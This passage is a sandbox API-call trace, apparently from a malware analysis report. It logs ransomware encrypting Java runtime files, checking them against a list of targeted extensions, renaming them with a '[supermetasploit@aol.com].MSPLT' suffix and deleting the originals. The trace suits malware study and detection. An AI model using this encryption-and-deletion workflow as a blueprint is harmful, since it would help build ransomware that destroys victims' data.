(normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar")) returned 1 [0304.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar") returned 56 [0304.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar") returned 56 [0304.950] lstrlenW (lpString=".doc") returned 4 [0304.951] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0304.951] lstrlenW (lpString=".docx") returned 5 [0304.951] lstrcmpiW (lpString1=".docx", lpString2="1.jar") returned -1 [0304.951] lstrlenW (lpString=".pdf") returned 4 [0304.951] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0304.951] lstrlenW (lpString=".xls") returned 4 [0304.951] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0304.951] lstrlenW (lpString=".xlsx") returned 5 [0304.951] lstrcmpiW (lpString1=".xlsx", lpString2="1.jar") returned -1 [0304.951] lstrlenW (lpString=".ppt") returned 4 [0304.951] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0304.951] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar") returned 56 [0304.951] lstrlenW (lpString=".zip") returned 4 [0304.951] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0304.951] lstrlenW (lpString=".rar") returned 4 [0304.951] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0304.951] lstrlenW (lpString=".bz2") returned 4 [0304.951] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0304.951] lstrlenW (lpString=".7z") returned 3 [0304.951] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0304.951] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar") returned 56 [0304.951] lstrlenW (lpString=".dbf") returned 4 [0304.951] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0304.951] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar") returned 56 [0304.951] lstrlenW (lpString=".1cd") returned 4 [0304.951] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0304.951] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar") returned 56 [0304.952] lstrlenW (lpString=".jpg") returned 4 [0304.952] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0304.952] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar") returned 56 [0304.952] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar") returned 56 [0304.952] lstrlenW (lpString=".doc") returned 4 [0304.952] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0304.952] lstrlenW (lpString=".docx") returned 5 [0304.952] lstrcmpiW (lpString1=".docx", lpString2="1.jar") returned -1 [0304.952] lstrlenW (lpString=".pdf") returned 4 [0304.952] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0304.952] lstrlenW (lpString=".xls") returned 4 [0304.952] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0304.952] lstrlenW (lpString=".xlsx") returned 5 [0304.952] lstrcmpiW (lpString1=".xlsx", lpString2="1.jar") returned -1 [0304.952] lstrlenW (lpString=".ppt") returned 4 [0304.952] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0304.952] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar") returned 56 [0304.952] lstrlenW (lpString=".zip") returned 4 [0304.952] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0304.952] lstrlenW (lpString=".rar") returned 4 [0304.952] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0304.952] lstrlenW (lpString=".bz2") returned 4 [0304.952] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0304.952] lstrlenW (lpString=".7z") returned 3 [0304.952] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0304.952] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar") returned 56 [0304.953] lstrlenW (lpString=".dbf") returned 4 [0304.953] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0304.953] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar") returned 56 [0305.005] lstrlenW (lpString=".1cd") returned 4 [0305.005] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0305.005] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar") returned 56 [0305.005] lstrlenW (lpString=".jpg") returned 4 [0305.005] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0305.009] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0305.009] lstrlenW (lpString="flavormap.properties") returned 20 [0305.009] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\flavormap.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0305.623] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=3928) returned 1 [0305.623] CloseHandle (hObject=0x420) returned 1 [0305.623] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\flavormap.properties")) returned 0x20 [0305.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\flavormap.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0306.096] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\flavormap.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0306.402] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.402] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.402] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\flavormap.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0306.805] GetLastError () returned 0x0 [0306.805] ReadFile (in: hFile=0x524, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0xf58, lpOverlapped=0x0) returned 1 [0306.812] WriteFile (in: hFile=0x52c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xf60, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xf60, lpOverlapped=0x0) returned 1 [0306.813] ReadFile (in: hFile=0x524, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0306.813] WriteFile (in: hFile=0x52c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xfc, lpOverlapped=0x0) returned 1 [0306.814] SetEndOfFile (hFile=0x52c) returned 1 [0306.814] CloseHandle (hObject=0x52c) returned 1 [0306.820] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.820] SetEndOfFile (hFile=0x524) returned 1 [0306.826] CloseHandle (hObject=0x524) returned 1 [0306.826] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0306.827] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\flavormap.properties")) returned 1 [0306.828] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties") returned 59 [0306.828] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties") returned 59 [0306.828] lstrlenW (lpString=".doc") returned 4 [0306.828] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0306.828] lstrlenW (lpString=".docx") returned 5 [0306.828] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0306.829] lstrlenW (lpString=".pdf") returned 4 [0306.829] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0306.829] lstrlenW (lpString=".xls") returned 4 [0306.829] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0306.829] lstrlenW (lpString=".xlsx") returned 5 [0306.829] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0306.829] lstrlenW (lpString=".ppt") returned 4 [0306.829] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0306.829] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties") returned 59 [0306.829] lstrlenW (lpString=".zip") returned 4 [0306.829] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0306.829] lstrlenW (lpString=".rar") returned 4 [0306.829] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0306.829] lstrlenW (lpString=".bz2") returned 4 [0306.829] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0306.829] lstrlenW (lpString=".7z") returned 3 [0306.829] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0306.829] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties") returned 59 [0306.829] lstrlenW (lpString=".dbf") returned 4 [0306.829] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0306.829] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties") returned 59 [0306.829] lstrlenW (lpString=".1cd") returned 4 [0306.829] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0306.829] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties") returned 59 [0306.829] lstrlenW (lpString=".jpg") returned 4 [0306.829] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0306.830] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties") returned 59 [0306.830] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties") returned 59 [0306.830] lstrlenW (lpString=".doc") returned 4 [0306.830] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0306.830] lstrlenW (lpString=".docx") returned 5 [0306.830] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0306.830] lstrlenW (lpString=".pdf") returned 4 [0306.830] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0306.830] lstrlenW (lpString=".xls") returned 4 [0306.830] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0306.830] lstrlenW (lpString=".xlsx") returned 5 [0306.830] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0306.830] lstrlenW (lpString=".ppt") returned 4 [0306.830] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0306.830] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties") returned 59 [0306.830] lstrlenW (lpString=".zip") returned 4 [0306.830] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0306.830] lstrlenW (lpString=".rar") returned 4 [0306.830] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0306.830] lstrlenW (lpString=".bz2") returned 4 [0306.830] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0306.830] lstrlenW (lpString=".7z") returned 3 [0306.830] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0306.830] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties") returned 59 [0306.831] lstrlenW (lpString=".dbf") returned 4 [0306.831] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0306.831] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties") returned 59 [0306.831] lstrlenW (lpString=".1cd") returned 4 [0306.831] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0306.831] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties") returned 59 [0306.831] lstrlenW (lpString=".jpg") returned 4 [0306.831] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0306.831] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0306.831] lstrlenW (lpString="LucidaBrightDemiItalic.ttf") returned 26 [0306.831] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemiitalic.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0306.832] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=75124) returned 1 [0306.832] CloseHandle (hObject=0x524) returned 1 [0306.832] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemiitalic.ttf")) returned 0x20 [0306.832] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemiitalic.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0306.833] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemiitalic.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0306.833] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.833] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.833] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemiitalic.ttf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0306.834] GetLastError () returned 0x0 [0306.834] ReadFile (in: hFile=0x524, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x12574, lpOverlapped=0x0) returned 1 [0306.842] WriteFile (in: hFile=0x52c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x12580, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x12580, lpOverlapped=0x0) returned 1 [0306.844] ReadFile (in: hFile=0x524, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0306.845] WriteFile (in: hFile=0x52c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x108, lpOverlapped=0x0) returned 1 [0306.845] SetEndOfFile (hFile=0x52c) returned 1 [0306.845] CloseHandle (hObject=0x52c) returned 1 [0306.850] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.850] SetEndOfFile (hFile=0x524) returned 1 [0307.023] CloseHandle (hObject=0x524) returned 1 [0307.023] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0307.024] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemiitalic.ttf")) returned 1 [0307.025] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 71 [0307.025] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 71 [0307.025] lstrlenW (lpString=".doc") returned 4 [0307.025] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0307.025] lstrlenW (lpString=".docx") returned 5 [0307.025] lstrcmpiW (lpString1=".docx", lpString2="c.ttf") returned -1 [0307.025] lstrlenW (lpString=".pdf") returned 4 [0307.025] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0307.025] lstrlenW (lpString=".xls") returned 4 [0307.025] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0307.025] lstrlenW (lpString=".xlsx") returned 5 [0307.025] lstrcmpiW (lpString1=".xlsx", lpString2="c.ttf") returned -1 [0307.025] lstrlenW (lpString=".ppt") returned 4 [0307.025] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0307.026] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 71 [0307.026] lstrlenW (lpString=".zip") returned 4 [0307.026] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0307.026] lstrlenW (lpString=".rar") returned 4 [0307.026] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0307.026] lstrlenW (lpString=".bz2") returned 4 [0307.026] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0307.026] lstrlenW (lpString=".7z") returned 3 [0307.026] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0307.026] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 71 [0307.026] lstrlenW (lpString=".dbf") returned 4 [0307.026] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0307.026] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 71 [0307.026] lstrlenW (lpString=".1cd") returned 4 [0307.026] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0307.026] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 71 [0307.026] lstrlenW (lpString=".jpg") returned 4 [0307.026] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0307.026] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 71 [0307.026] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 71 [0307.027] lstrlenW (lpString=".doc") returned 4 [0307.027] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0307.027] lstrlenW (lpString=".docx") returned 5 [0307.027] lstrcmpiW (lpString1=".docx", lpString2="c.ttf") returned -1 [0307.027] lstrlenW (lpString=".pdf") returned 4 [0307.027] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0307.027] lstrlenW (lpString=".xls") returned 4 [0307.027] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0307.027] lstrlenW (lpString=".xlsx") returned 5 [0307.027] lstrcmpiW (lpString1=".xlsx", lpString2="c.ttf") returned -1 [0307.027] lstrlenW (lpString=".ppt") returned 4 [0307.027] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0307.027] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 71 [0307.027] lstrlenW (lpString=".zip") returned 4 [0307.027] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0307.027] lstrlenW (lpString=".rar") returned 4 [0307.027] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0307.028] lstrlenW (lpString=".bz2") returned 4 [0307.028] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0307.028] lstrlenW (lpString=".7z") returned 3 [0307.028] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0307.028] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 71 [0307.028] lstrlenW (lpString=".dbf") returned 4 [0307.028] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0307.028] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 71 [0307.029] lstrlenW (lpString=".1cd") returned 4 [0307.029] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0307.029] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 71 [0307.029] lstrlenW (lpString=".jpg") returned 4 [0307.029] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0307.029] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0307.029] lstrlenW (lpString="LucidaBrightRegular.ttf") returned 23 [0307.029] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightregular.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0307.031] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=344908) returned 1 [0307.031] CloseHandle (hObject=0x524) returned 1 [0307.031] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightregular.ttf")) returned 0x20 [0307.031] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightregular.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0307.032] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0307.032] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0307.032] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0307.033] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightregular.ttf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0307.033] GetLastError () returned 0x0 [0307.033] ReadFile (in: hFile=0x524, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x5434c, lpOverlapped=0x0) returned 1 [0307.055] WriteFile (in: hFile=0x52c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x54350, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x54350, lpOverlapped=0x0) returned 1 [0307.650] ReadFile (in: hFile=0x524, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0307.650] WriteFile (in: hFile=0x52c, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x102, lpOverlapped=0x0) returned 1 [0307.650] SetEndOfFile (hFile=0x52c) returned 1 [0307.650] CloseHandle (hObject=0x52c) returned 1 [0307.664] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0307.664] SetEndOfFile (hFile=0x524) returned 1 [0307.961] CloseHandle (hObject=0x524) returned 1 [0307.962] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0307.962] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightregular.ttf")) returned 1 [0307.963] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf") returned 68 [0307.963] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf") returned 68 [0307.963] lstrlenW (lpString=".doc") returned 4 [0307.963] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0307.963] lstrlenW (lpString=".docx") returned 5 [0307.963] lstrcmpiW (lpString1=".docx", lpString2="r.ttf") returned -1 [0307.963] lstrlenW (lpString=".pdf") returned 4 [0307.963] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0307.963] lstrlenW 